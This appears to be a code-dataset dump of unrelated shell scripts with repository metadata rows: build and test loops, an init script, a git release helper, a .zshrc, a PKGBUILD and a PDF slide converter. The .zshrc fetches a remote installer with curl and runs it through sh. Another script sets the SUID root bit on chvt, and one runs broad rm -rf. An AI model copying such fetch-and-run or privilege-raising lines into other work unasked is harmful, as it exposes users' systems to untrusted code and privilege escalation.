done
# copy all files from fixtures directory to `run`
rm -rfd run
cp -r $fixtures_dir run
cd run
for dir in *
do
cd $dir
echo "Running storybook-cli in $dir"
if [ $dir == *"native"* ]
then
# run @storybook/cli
../../../bin/index.js init --skip-install --yes --install-server
else
# run @storybook/cli
../../../bin/index.js init --skip-install --yes
fi
cd ..
done
cd ..
# install all the dependencies in a single run
cd ../../..
echo "Running bootstrap"
yarn install --non-interactive --silent --pure-lockfile
cd ${test_root}/run
for dir in *
do
# check that storybook starts without errors
cd $dir
echo "Running smoke test in $dir"
failed=0
yarn storybook --smoke-test --quiet || failed=1
if [ $failed -eq 1 ]
then
exit 1
fi
cd ..
done
| true
|
7e5caa03e4c803edd1f8fd8dee8a68151b6d56ae
|
Shell
|
PonteIneptique/docview
|
/etc/docview-init
|
UTF-8
| 778
| 3.28125
| 3
|
[] |
no_license
|
#! /bin/sh
# description: Docview Start Stop Restart
# chkconfig: 234 20 80
#JAVA_HOME=/usr/java/jdk1.7.0_05
JAVA_HOME=/usr/lib/jvm/jre-1.6.0-sun.x86_64
export JAVA_HOME
PATH=$JAVA_HOME/bin:$PATH
export PATH
export USER=docview
APP="docview"
APP_PATH="/opt/webapps/$APP"
CONF=$APP_PATH/conf/prod.conf
start() {
cd $APP_PATH
su $USER -c "$APP_PATH/target/start -DapplyEvolutions.default=true -Dhttp.port=9000 -Dconfig.file=$CONF &"
}
stop() {
kill `cat $APP_PATH/RUNNING_PID`
}
case "$1" in
start)
echo "Starting $APP"
start
echo "$APP started."
;;
stop)
echo "Stopping $APP"
stop
echo "$APP stopped."
;;
restart)
echo "Restarting $APP."
stop
sleep 2
start
echo "$APP restarted."
;;
*)
N=/etc/init.d/$APP
echo "Usage: $N {start|stop|restart}" >&2
exit 1
;;
esac
exit 0
| true
|
e9726b3b8c88b7e58d9b59bab4c47a52639b376c
|
Shell
|
Jimmy-Xu/docker-hub-stat
|
/list_repo/run.sh
|
UTF-8
| 1,313
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# list repo by namespace with list_repo.sh
WORKER_CNT=50
SRC_BASE="../search_repo/process_result"
function show_usage(){
cat <<EOF
usage: ./run.sh <dir_name>
<dir_name>: sub_dir under ./result
eg: ./run.sh 20160111
-----------------------
[available]:
EOF
ls ${SRC_BASE}
exit 1
}
#check parameter
if [ $# -ne 1 ];then
echo "parameter error!"
show_usage
fi
#check input parameter
SRC_DIR="${SRC_BASE}/$1/"
USER_LIST="${SRC_DIR}/user.txt"
NAMESPACE_LIST="etc/namespace.txt"
if [ ! -d ${SRC_DIR} ];then
echo "${SRC_DIR} not found!"
show_usage
else
if [ ! -s ${USER_LIST} ];then
echo "${USER_LIST} is not exist or is empty"
show_usage
fi
fi
#generate ${NAMESPACE_LIST}
cat etc/official.txt ${USER_LIST} > ${NAMESPACE_LIST}
#start
total=$(cat ${NAMESPACE_LIST}|wc -l)
OUT_BASE="./list_result/$1"
while read NAMESPACE
do
echo "==== [ ${total} ] ${NAMESPACE} ===="
p_cnt=$(ps -ef |grep "list_repo.sh" | grep -v grep | wc -l)
while [ ${p_cnt} -ge ${WORKER_CNT} ]
do
sleep 5
p_cnt=$(ps -ef |grep "list_repo.sh" | grep -v grep | wc -l)
done
OUT_DIR="${OUT_BASE}/${NAMESPACE}"
if [ ! -f ${OUT_DIR}/end ];then
#not fetched
./list_repo.sh $1 ${NAMESPACE} ${total} &
#sleep 0.5
fi
total=$((total-1))
done < ${NAMESPACE_LIST}
echo "All Done"
| true
|
d7f46c4a87a4037135f833f030644f4b0b175b17
|
Shell
|
zablonbaraka85/cs6340
|
/Assignment6/constraints/checker
|
UTF-8
| 975
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
if (( $# < 2 )); then
echo "usage: $0 modref|escape TESTCASE"
exit 1
fi
test ! -d "examples/$2" && echo "unknown example $2">&2 && exit 1
case "$1" in
modref)
echo "[+] Note: < is from reference but not yours, > is in yours but not reference"
echo "[+] modInstField"
diff sample_output/$2/modInstField.txt examples/$2/chord_output/modInstField.txt
echo "[+] refInstField"
diff sample_output/$2/refInstField.txt examples/$2/chord_output/refInstField.txt
echo "[+] refStatField"
diff sample_output/$2/refStatField.txt examples/$2/chord_output/refStatField.txt
echo "[+] modStatField"
diff sample_output/$2/modStatField.txt examples/$2/chord_output/modStatField.txt
;;
escape)
echo "[+] Note: < is from reference but not yours, > is in yours but not reference"
echo "[+] localMH"
diff sample_output/$2/localMH.txt examples/$2/chord_output/localMH.txt
;;
*) echo "unknown analysis $1" >&2
;;
esac
| true
|
f6b511405df8ca476761b52127a682f7b17b1853
|
Shell
|
overo/overo-oe-natty
|
/recipes/keylaunch/keylaunch-conf/80chvt-SUID
|
UTF-8
| 600
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh
#
# Copyright Matthias Hentges <devel@hentges.net> (c) 2006
# License: GPL (see http://www.gnu.org/licenses/gpl.txt for a copy of the license)
#
# Filename: chvt-SUID.sh
# Date: 28-May-06
#
# Sets the SUID bit on chvt to allow changing to the VT from inside X by
# any user. Since a SUID binary still is a security risk, we chmod only
# when keylaunch is used and not by default.
#
for target in /usr/bin/chvt.console-tools
do
if test "`ls -l "$target" | awk '{print $1}'|cut -c 2-4`" != "rws"
then
echo "Making [$target] SUID root..."
chmod u+s "$target"
else
echo "Ignoring [$target]"
fi
done
| true
|
a1e2c28cdb113ba75c1d31252946a503fe5475e0
|
Shell
|
gyzhangqm/CFDWARP
|
/tools/gitnewversion_public.sh
|
UTF-8
| 4,129
| 3.9375
| 4
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
filecheck=".makefile-header-default"
warppublic="../warp_public"
tmpfile="UHFGHnhKJLJGHGGHKJkljk_tmpfile_from_gitnewversion_public.txt"
command -v git >/dev/null 2>&1 || { echo "ERROR: gitnewversion_public.sh requires git but it is not installed. Aborting." >&2; exit 1; }
if [ -f "$filecheck" ]; then
echo "Checking that the current directory is the warp main directory. [OK]";
else
echo "ERROR: gitnewversion_public.sh must be run from the warp main directory. Exiting.";
exit 1
fi
if [ $# -eq 1 ]; then
echo "Checking arguments: $1 specified as new version to commit. [OK]";
else
echo "ERROR: gitnewversion_public.sh needs one argument: the new version string. Exiting.";
exit 1
fi
if [ -n "$(git show-ref --tags $1)" ]; then
echo "Checking that version $1 is found on main warp git. [OK]";
else
echo "ERROR: version $1 not yet committed. Please commit version $1 to private warp before committing it to the public warp." ;
exit 1
fi
latesttag=$(git describe --tags `git rev-list --tags --max-count=1`);
if [ "$1" = "$latesttag" ]; then
echo "Checking that the latest tag is $1 on the main warp git. [OK]";
else
echo "ERROR: The tag given $1 is not set to the latest tag $latesttag on the main warp git. Exiting.";
exit 1
fi
if [ -n "$(git status --porcelain)" ]; then
echo "ERROR: Changes or untracked files reported by git on main warp. Please commit changes to the private warp before committing them to the public warp.";
exit 1
else
echo "Checking that there is no changes or untracked files reported by git on main warp. [OK]";
fi
if [ -d "$warppublic" ]; then
echo "Checking that the $warppublic directory exists. [OK]";
else
echo "The directory $warppublic does not exist. Cloning it from github.";
git clone https://bernardparent@github.com/bernardparent/CFDWARP "$warppublic"
if [ -d "$warppublic" ]; then
echo "Checking that the $warppublic directory has been created properly by git. [OK]";
else
echo "ERROR: The directory $warppublic does not exist. Exiting.";
exit 1
fi
fi
touch "$warppublic/$tmpfile"
if [ -f "$tmpfile" ]; then
echo "ERROR: The current directory is $warppublic, and not the main warp directory. Exiting.";
rm -f "$warppublic/$tmpfile"
exit 1
else
echo "Checking that the current directory is not $warppublic. [OK]";
rm -f "$warppublic/$tmpfile"
fi
if [ -d "$warppublic/.git" ]; then
echo "Checking that the $warppublic/.git directory exists. [OK]";
else
echo "ERROR: The directory $warppublic/.git does not exist. Exiting.";
exit 1
fi
echo "Pulling latest public warp from github..";
rm -rf "$warppublic"/*
cd $warppublic
git checkout master
git reset --hard
git pull --tags origin master
if [ -n "$(git status --porcelain)" ]; then
echo "ERROR: Changes or untracked files reported by git on $warppublic. Can not proceed. Exiting.";
exit 1
#echo "Changes or untracked files on $warppublic. This may not be a source of concern."
else
echo "Checking that there is no changes or untracked files reported by git on $warppublic. [OK]";
fi
cd -
rm -rf "$warppublic"/*
rm -f "$warppublic"/.*
cp -a * "$warppublic"
cp .* "$warppublic"
cd "$warppublic"
cd config
chmod u+x removeproprietary.sh
./removeproprietary.sh
chmod u-x removeproprietary.sh
cd ..
echo ' '
echo 'Calling git status to check what changes will be pushed..'
echo ' '
git status
echo ' '
echo -n "Add these changes in new version $1 on PUBLIC GITHUB? (y/N)"
read answer
if [ "$answer" != "${answer#[Yy]}" ] ;then
echo Yes
else
echo No
exit 1
fi
if [ -f "$filecheck" ]; then
if git show-ref --tags $1 ; then
echo ERROR: Version $1 already committed. Exiting.
exit 1
fi
if git ls-remote --exit-code --tags origin $1 ; then
echo ERROR: Version $1 already committed on github. Exiting.
exit 1
fi
echo 'Committing and pushing files to github..'
git add -A .
git commit -a -m "$1"
git tag -d $1 > /dev/null 2>&1
git tag -a $1 -m "$1"
git push --tags origin master
else
echo "ERROR: couldn't find $filecheck in $warppublic directory. Exiting."
exit 1
fi
echo '[done]'
| true
|
ff7447a102f33b1002b2d53c958d85f8ade69c81
|
Shell
|
hoodielive/dconf-nfs
|
/2-test.sh
|
UTF-8
| 1,065
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
# Initial test
# 1. Make a list of all the users that do not have a .config/dconf file instance
for users in $(cat /var/tmp/users); do
dconf=/home/$users/.config/dconf
if [ -d "${dconf}" ]; then
echo "$users" >> /var/tmp/with_dconf_file.txt
else
echo "$users" >> /var/tmp/without_dconf_file.txt
fi
done
# 2. Make sure none of these users get added to the /var/tmp/users list.
# Secondary tests
# 1. Make sure that 'user.txt' is not found
for users in $(cat /var/tmp/with_dconf_file.txt); do
if [ -f "/home/${users}/.config/dconf/user.txt" ]; then
echo "${users}" >> /var/tmp/user_bypass.txt
else
echo "${users}" >> /var/tmp/operation_on_users.txt
fi
done
# 2. If user.txt is found - skip
# 3. if user.txt is not found, is user file found? if not, skip, else become user and perform operation
# 4. test if operation was successful, if it was rm dconf-temp-profile and log it to a file in /var/tmp
# 5. If successful remove of dconf-temporary-profile - cd to next users dir
| true
|
b26dbb4d209c719f475fdab9b4f4850f154a3e7a
|
Shell
|
wang-shun/groundwork-trunk
|
/groundwork-monitor-os/build/master-build.sh
|
UTF-8
| 1,634
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
# description: monitor-core build script
# GroundWork Monitor - The ultimate data integration framework.
# Copyright 2007 GroundWork Open Source, Inc. "GroundWork"
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License
# as published by the Free Software Foundation and reprinted below;
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
BASE=$PWD/..
BUILD_DIR=$BASE/build
. checkEnv.sh
cd $BUILD_DIR
. checkEnv.sh
. downloadSources.sh
cd $BUILD_DIR
. buildBaseComponents.sh
BUILD_DIR=$BASE/build
cd $BUILD_DIR
. buildCore.sh
rm -rf /usr/local/groundwork/foundation*
#Build Monitor Pro RPM
cd $BASE
maven allBuild
maven allDeploy
find /usr/local/groundwork -name .svn -exec rm -rf {} \;
find /usr/local/groundwork -name .project -exec rm -rf {} \;
find /usr/local/groundwork -name maven.xml -exec rm -rf {} \;
find /usr/local/groundwork -name project.xml -exec rm -rf {} \;
cd $BUILD_DIR
. set-permissions.sh
cd /usr/local/groundwork
$BUILD_DIR/rpm-filelist.pl > /usr/local/core-filelist
cd $BASE/monitor-os/spec/
chmod +x buildRPM.sh
. buildRPM.sh
cd $BUILD_DIR/../build
. checkBuild.sh
| true
|
f585af020bc9771fcb85a0ae4501b2621d4fb79c
|
Shell
|
ops-class/sys161
|
/mipseb/tests/checkbin.sh
|
UTF-8
| 704
| 3.5
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
#
# checkbin.sh - check a mips binary for having exception handlers in the
# right place.
#
# Usage: checkbin.sh files
#
# Assumes the exception handlers are called "utlbexn" and "genexn".
# This will only fail if these symbols are present but in the wrong place.
#
mips-harvard-os161-nm -o "$@" | egrep ' utlbexn$| genexn$' |\
sed '
/^[^:]*:80000000 [Tt] utlbexn$/d
/^[^:]*:80000080 [Tt] genexn$/d
/^[^:]*:ffffffff80000000 [Tt] utlbexn$/d
/^[^:]*:ffffffff80000080 [Tt] genexn$/d
' |\
sed 's/:.*//' | awk '
{ f[++n] = $1 }
END {
if (n>0) {
printf "Failing files:\n" >"/dev/stderr";
for (i=1;i<=n;i++) {
print f[i];
}
exit(1);
}
}
' || exit 1
| true
|
4224d5b810d3506bf3a3b1a37a471ffc49b83a03
|
Shell
|
bjzq/adrv9009_fmcomms8_sync_test_bash
|
/dmesg_status.sh
|
UTF-8
| 193
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
file="log_dmesg.txt"
test=$(($1/3))
echo >>$file
echo >>$file
echo "test_nr: $test sample_nr: $1">>$file
echo >>$file
echo "***dmesg:">>$file
dmesg |tail -20 |grep -v axi>>$file
| true
|
cae244148ebaa1e69a5d7c39de907fa414a65886
|
Shell
|
AlexeyMK/.files
|
/zsh/plugins.zsh
|
UTF-8
| 4,141
| 2.71875
| 3
|
[] |
no_license
|
# this file uses `zplugin` to manage `zsh` plugins
#
# refs:
# - http://zdharma.org/zplugin/wiki/INTRODUCTION/
# - https://github.com/zdharma/zplugin#zplugin-wiki
# install `zplugin` if not already installed
# ref - https://github.com/zdharma/zplugin
if ! [ -d "$HOME/.zplugin" ]; then
sh -c "$(curl -fsSL https://raw.githubusercontent.com/zdharma/zplugin/master/doc/install.sh)"
fi
# <<<<<<<<<<<<<<<<<<< start of zplugin installer-added chunk >>>>>>>>>>>>>>>>>>>
source "$HOME/.zplugin/bin/zplugin.zsh"
autoload -Uz _zplugin
(( ${+_comps} )) && _comps[zplugin]=_zplugin
# <<<<<<<<<<<<<<<<<<< start of zplugin installer-added chunk >>>>>>>>>>>>>>>>>>>
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<< start of plugins >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# `zplugin` has a concept called ice modifiers which applies single-use
# modifiers to the next loaded plugin.
#
# the `ice` name communicates that the modifiers last for only the next zplugin
# command
#
# here are the modifiers used in this file:
#
# - wait - load asynchronously
# - atload - command to run when the plugin finishes loading
# - lucid - skip `Loaded ...` message
#
# refs:
# - https://github.com/zdharma/zplugin#ice-modifiers
# - http://zdharma.org/zplugin/wiki/INTRODUCTION/#some_ice-modifiers
# TODO: install `fzf` & `fasd` with `zplugin`?
# ref - search zsh-autosuggestions
# http://zdharma.org/zplugin/wiki/GALLERY/#plugins
zplugin ice wait lucid atload'_zsh_autosuggest_start'
zplugin light zsh-users/zsh-autosuggestions
# ref - search fast-syntax-highlighting
# http://zdharma.org/zplugin/wiki/GALLERY/#plugins
zplugin ice wait lucid atinit"ZPLGM[COMPINIT_OPTS]=-C; zpcompinit; zpcdreplay"
zplugin light zdharma/fast-syntax-highlighting
# synchronize system clipboard
# theoretically you might need to source this after other keymappings, have not
# yet seen a need for enforcing that
zplugin ice wait lucid
zplugin light kutsan/zsh-system-clipboard
# similar to `jk/`, convenient when query already typed out
# ref - https://github.com/zsh-users/zsh-history-substring-search
zplugin light zsh-users/zsh-history-substring-search
# prompt
# ref - https://github.com/romkatv/powerlevel10k#zplugin
zplugin ice depth=1
zplugin light romkatv/powerlevel10k
# provide `yarn remove` & `yarn add` completions
# TODO: make this async
# zplugin ice wait lucid
zplugin light buonomo/yarn-completion
# TODO: figure this out
# type `fuck` to correct last typed command
# zplugin ice wait lucid
# zplugin light laggardkernel/zsh-thefuck
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< end of plugins >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# <<<<<<<<<<<<<<<<<<<<<<<<<<< start of plugin config >>>>>>>>>>>>>>>>>>>>>>>>>>>
# <<<< syntax highlighting >>>>
# TODO: understand why this doesn't seem to be working
# refs:
# - https://github.com/zsh-users/zsh-syntax-highlighting/blob/master/docs/highlighters/main.md
# - https://github.com/zsh-users/zsh-syntax-highlighting/blob/master/docs/highlighters.md
typeset -A ZSH_HIGHLIGHT_STYLES
ZSH_HIGHLIGHT_STYLES[comment]='fg=magenta'
ZSH_HIGHLIGHT_STYLES[alias]='fg=magenta,bold'
# <<<< autosuggestions >>>>
# ref - https://github.com/zsh-users/zsh-autosuggestions#configuration
ZSH_AUTOSUGGEST_HIGHLIGHT_STYLE='fg=244' # light grey
ZSH_AUTOSUGGEST_USE_ASYNC=true # can be set to anything
# in the future consider testing `completion` strategy on feature branch
# ref - https://github.com/zsh-users/zsh-autosuggestions/compare/features/completion-suggestions
ZSH_AUTOSUGGEST_STRATEGY=(history)
# << keymappings >>
# ref - https://github.com/zsh-users/zsh-autosuggestions#key-bindings
# accept until end of line (same as right arrow)
bindkey '^e' autosuggest-accept
# accept until end of line and immediately execute
bindkey '^ ' autosuggest-execute
# accept next word
bindkey '^w' vi-forward-word
# <<<< history-substring-search >>>>
# << keymappings >>
bindkey '^u' history-substring-search-up
bindkey '^y' history-substring-search-down
# <<< zsh-system-clipboard
# https://github.com/kutsan/zsh-system-clipboard#options
typeset -g ZSH_SYSTEM_CLIPBOARD_TMUX='true'
# <<<<<<<<<<<<<<<<<<<<<<<<<<<< end of plugin config >>>>>>>>>>>>>>>>>>>>>>>>>>>>
| true
|
f44d24498e10cc28b51dbd16f16824d7d0bc6952
|
Shell
|
lxy117/test
|
/4shell_5.sh
|
UTF-8
| 315
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
for ((i=1;i<=9;i++))
do
for ((j=1;j<=9;j++))
do
if [ $j -lt $i ]
then
num=$((i*j))
echo -n $i*$j=$num$'\t'
fi
if [ $j -eq $i ]
then
num=$((i*j))
echo $i*$j=$num
fi
done
done
| true
|
aed79be6e194a05b2d82069c85474a6140f5cc8b
|
Shell
|
WorkflowCenter-Repositories/Core-LifecycleScripts
|
/Lib-install.sh
|
UTF-8
| 1,013
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
CONTAINER_NAME=$1
Lib_URL=$2
Lib_name=$(ctx node properties lib_name)
Lib_path=$(ctx node properties lib_path)
sudo docker exec -it ${CONTAINER_NAME} test -f $Lib_path/$Lib_name || test -f $Lib_name && exit 0
set +e
Wget=$(sudo docker exec -it ${CONTAINER_NAME} which wget)
set -e
if [[ -z ${Wget} ]]; then
sudo docker exec -it ${CONTAINER_NAME} apt-get update
sudo docker exec -it ${CONTAINER_NAME} apt-get -y install Wget
fi
sudo docker exec -it ${CONTAINER_NAME} test -d $Lib_path && sudo docker exec -it ${CONTAINER_NAME} rm -rf $Lib_path
file_name=$(basename "$Lib_URL")
sudo docker exec -it ${CONTAINER_NAME} test ! -f $file_name && sudo docker exec -it ${CONTAINER_NAME} wget ${Lib_URL}
tar="tar.gz"
set +e
sudo docker exec -it ${CONTAINER_NAME} test "${file_name#*$tar}" != "$file_name" && sudo docker exec -it ${CONTAINER_NAME} tar -zxvf $file_name
sudo docker exec -it ${CONTAINER_NAME} chmod -R 777 $Lib_path/$Lib_name
set -e
| true
|
750f69daf9a317d53a8509e8c6c37e829f6a401a
|
Shell
|
leoylung/misc
|
/.zshrc
|
UTF-8
| 2,197
| 2.84375
| 3
|
[] |
no_license
|
# Path to your oh-my-zsh installation.
export ZSH="/Users/leolung/.oh-my-zsh"
ZSH_THEME="leolung"
# Which plugins would you like to load?
# Standard plugins can be found in ~/.oh-my-zsh/plugins/*
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(git)
source $ZSH/oh-my-zsh.sh
# User configuration
export LESS="-F -X $LESS"
# git aliases
# idempotent
alias gs='git status'
alias gl='git log --pretty=format:"'"%C(yellow)%h %Cred%ad (%cr) %Cblue%an%Cgreen%d %Creset%s"'" --date=local'
alias gla='git log --graph --all --decorate --pretty=format:"'"%C(yellow)%h %Cred%ad (%cr) %Cblue%an%Cgreen%d %Creset%s"'" --date=local'
alias gd='git diff'
alias gdn='git diff --name-only'
alias gdm='git diff origin/master'
alias gdnm='git diff --name-only origin/master'
# committing
alias ga='git add'
alias gcm='git commit -m'
alias gam='git commit --amend'
# remote
alias gf='git fetch'
alias grom='git rebase origin/master'
alias gmom='git merge origin/master'
# branching
alias gb='git branch'
alias gco='git checkout'
# tmux
tmuxquad() {
tmux splitw -h -p 50 -t 0
tmux splitw -v -p 50 -t 0
tmux selectp -t 0
tmux splitw -v -p 50 -t 2
tmux selectp -t 0
}
tmuxvsplit() {
tmux splitw -h -p 50 -t 0
tmux splitw -v -p 50 -t 1
tmux splitw -v -p 50 -t 1
tmux selectp -t 0
}
tmuxhsplit() {
tmux splitw -v -p 50 -t 0
tmux selectp -t 0
}
# android
alias adbt='adb shell input text'
# Fix numeric keypad
# 0 . Enter
bindkey -s "^[Op" "0"
bindkey -s "^[On" "."
bindkey -s "^[OM" "^M"
# 1 2 3
bindkey -s "^[Oq" "1"
bindkey -s "^[Or" "2"
bindkey -s "^[Os" "3"
# 4 5 6
bindkey -s "^[Ot" "4"
bindkey -s "^[Ou" "5"
bindkey -s "^[Ov" "6"
# 7 8 9
bindkey -s "^[Ow" "7"
bindkey -s "^[Ox" "8"
bindkey -s "^[Oy" "9"
# + - * / =
bindkey -s "^[Ol" "+"
bindkey -s "^[Om" "-"
bindkey -s "^[Oj" "*"
bindkey -s "^[Oo" "/"
bindkey -s "^[OX" "="
| true
|
81be1c63beceb8c41c58eb68cc73bf5a8bea07d7
|
Shell
|
surendrabvv/hacker-rank-practice
|
/LinuxShell/Bash/ComputeTheAverage.sh
|
UTF-8
| 268
| 3.140625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
## Problem : https://www.hackerrank.com/challenges/bash-tutorials---compute-the-average/problem
readarray -t arr
count="${arr[0]}"
unset arr[0]
for value in ${arr[@]}; do
((sum+=value))
done
a="$(echo "scale=8; $sum/$count" | bc)"
printf '%0.3f\n' "$a"
| true
|
5f5b96624240341c870d0b452c9f2463e20bae1f
|
Shell
|
aKhalili147/Image-processing
|
/resize.sh
|
UTF-8
| 288
| 3.328125
| 3
|
[] |
no_license
|
#! /bin/sh
# move output files to folders
rm -rf resized strip
mkdir -p resized strip
for file in $(ls | grep _resized); do
mv $file resized/$file
done
for file in $(ls | grep _strip); do
mv $file strip/$file
done
./extractStrip -m $(find `pwd`/strip -iname *strip*.bmp | sort -V)
| true
|
15a1e9899df089bc85ec76452c2c42da1578900d
|
Shell
|
IPv6-mPvD/pvdd
|
/tests/pvdid-set-attribute.sh
|
UTF-8
| 272
| 2.875
| 3
|
[] |
no_license
|
#!/bin/sh
. `dirname $0`/check-nc.sh
if [ $# != 3 ]
then
echo "usage : $0 pvdname attrName attrValue"
exit 1
fi
{
echo PVD_CONNECTION_PROMOTE_CONTROL
echo PVD_BEGIN_TRANSACTION "$1"
echo PVD_SET_ATTRIBUTE "$@"
echo PVD_END_TRANSACTION "$1"
} | $NC 0.0.0.0 10101
| true
|
7cfbb92b2192519d15391ed0ed8a6a3c859784a7
|
Shell
|
PiyushMattoo/openshift-log-cartridge_stg
|
/bin/install
|
UTF-8
| 830
| 2.640625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
source $OPENSHIFT_CARTRIDGE_SDK_BASH
LOGSTASH_VERSION='1.5.0'
LOGSTASH_NAME="logstash-${LOGSTASH_VERSION}"
LOGSTASH_URL="https://git.labs.dell.com/projects/BD/repos/logstash-output-batched_http/browse/artifacts/${LOGSTASH_NAME}.tar.gz?raw"
cd ${OPENSHIFT_DATA_DIR}
wget ${LOGSTASH_URL}
tar -xzf ${LOGSTASH_NAME}.tar.gz?raw
mv ${LOGSTASH_NAME} logstash
rm ${LOGSTASH_NAME}.tar.gz?raw
#Create Logging Application
curl -X POST -H "content-type: application/json" -u ${OPENSHIFT_DORADUS_USER}:${OPENSHIFT_DORADUS_PWD} -d '{"LoggingApplication": { "tables": {"Logs": { "fields": {"Timestamp": {"type": "timestamp"},"LogLevel": {"type": "text"},"Message": {"type": "text"}, "Source": {"type": "text"}}}}}}' http://${OPENSHIFT_DORADUS_HOST}:${OPENSHIFT_DORADUS_PORT}/_applications?tenant=${OPENSHIFT_DORADUS_TENANT}
| true
|
206b637b77ba2b50e741b2d0f14a05fd2795116a
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/bitsquare/PKGBUILD
|
UTF-8
| 1,967
| 2.703125
| 3
|
[] |
no_license
|
# Maintainer: David Parrish <daveparrish@tutanota.com>
pkgname=bitsquare
pkgver=0.4.9.9.3
pkgrel=1
pkgdesc="Cross-platform desktop application that allows users to trade national currency (dollars, euros, etc) for bitcoin without relying on centralized exchanges"
arch=('any')
url="https://bitsquare.io/"
license=('AGPL3')
depends=('java-openjfx')
makedepends=('maven' 'jdk8-openjdk')
source=("${pkgname}::git+https://github.com/bitsquare/bitsquare.git#tag=v${pkgver}"
"git+https://github.com/bitsquare/bitcoinj.git#commit=3a2e6baae74e4ed8d20edf73a2914297cde47f6c"
"bitsquare.sh"
"bitsquare.desktop")
sha256sums=('SKIP'
'SKIP'
'95a61502d44523c983549d6bf3deb81dc49fef490a187d28fd16e024c2d3e2aa'
'15592a05a2a4d6cb65c757e9eec5e3818bf38e7397a3b98e7651a8a3b51f9ba9')
build() {
# Use a temporary local maven repository.
local mvn_repo="$srcdir/mvn-repository"
cd "${srcdir}/bitcoinj"
echo "Building bitcoinj ..."
mvn clean install -Dmaven.repo.local="$mvn_repo" -DskipTests -Dmaven.javadoc.skip=true
cd "${srcdir}/${pkgname}"
echo "Building bitsquare ..."
mvn clean package -Dmaven.repo.local="$mvn_repo" -DskipTests
}
package() {
# Install executable.
install -D -m755 "bitsquare.sh" "${pkgdir}/usr/bin/bitsquare"
install -D -m644 "${srcdir}/${pkgname}/gui/target/shaded.jar" "${pkgdir}/usr/share/java/bitsquare/shaded.jar"
# Install desktop launcher.
install -Dm644 bitsquare.desktop "${pkgdir}/usr/share/applications/bitsquare.desktop"
install -Dm644 "${srcdir}/${pkgname}/package/linux/icon.png" "${pkgdir}/usr/share/pixmaps/bitsquare.png"
# Install BouncyCastleProvider
# https://github.com/bitsquare/bitsquare/blob/master/doc/build.md#3-copy-the-bountycastle-provider-jar-file
local mvn_repo="$srcdir/mvn-repository"
install -Dm644 "$mvn_repo/org/bouncycastle/bcprov-jdk15on/1.53/bcprov-jdk15on-1.53.jar" \
"${pkgdir}/usr/lib/jvm/java-8-openjdk/jre/lib/ext/bcprov-jdk15on-1.53.jar"
}
| true
|
07aa49e69ed1c228ff25f6f64ed5da1948804a52
|
Shell
|
MejiroSilence/UCLA-CS251A-Advanced-Computer-Architecture
|
/HW3_Gem5_Instruction_Hacking/run.sh
|
UTF-8
| 432
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
GEM5_BASE=~/gem5
TARGET=/root/gem5/configs/example/se.py
SRC_DIR=$(pwd)
rm -rf result; mkdir result
gcc -S test.c
gcc -o test test.c
cd $GEM5_BASE
build/X86/gem5.opt ${TARGET} \
--cmd=${SRC_DIR=$(pwd)}/test \
--cpu-type=DerivO3CPU \
--l1d_size=64kB --l1i_size=64kB --caches \
--l2_size=2MB --l2cache \
--sys-clock=1GHz --cpu-clock=1GHz \
--mem-type=DDR3_1600_8x8
cp m5out/* ${SRC_DIR}/result
| true
|
00e19ca071c24eeb45ad3bf6f3e6d9f1a4d44ab3
|
Shell
|
TrustHenry/environments
|
/servers/na-002/setup.sh
|
UTF-8
| 438
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
## Setup the nodes running on this server
set -xeu
set -o pipefail
SELF_PATH=$(cd $(dirname "${BASH_SOURCE[0]}") && pwd)
cp -Rv ${SELF_PATH}/srv /
cp -Rv ${SELF_PATH}/../common/usr /
mkdir -p /srv/stoa/
systemctl daemon-reload
systemctl enable agora@6.service
systemctl enable agora@7.service
# systemctl enable stoa.service
systemctl start agora@6.service
systemctl start agora@7.service
#systemctl start stoa.service
| true
|
b3f7eb1e4741b27fe09ef1a4a675d73e5e414024
|
Shell
|
Clareee1/COMP2041_20T2
|
/lab/lab05/snapshot-load.sh
|
UTF-8
| 388
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/dash
snapshot-save.sh
num="$1";
echo "Restoring snapshot $num"
curr="./.snapshot.$num"
for file in *
do
if (echo "$file"|egrep "^\.">/dev/null) #ignore name starts with .
then
continue;
fi
if [ $file = "snapshot-save.sh" ] || [ $file = "snapshot-load.sh" ] || [ $file = "*" ]
then
continue;
fi
cp "$curr/$file" "$file"
done
| true
|
d8bfd4dee639dfc0c10675ad9de97c861de38b9d
|
Shell
|
rishabhrbs96/slide_transition_detection
|
/code/convert_pdf.sh
|
UTF-8
| 654
| 2.96875
| 3
|
[] |
no_license
|
rm -f inter*
rm -f slide*
rm -f common*
convert -density 300 document.pdf slide%d.jpg
counter=0
pages=$(pdfinfo document.pdf | grep Pages | awk '{print $2}')
((pages--))
until [ $counter -gt $pages ]
do
#echo $counter
ffmpeg -i slide$(echo $counter).jpg -vf scale=640:360 inter$(echo $counter).jpg
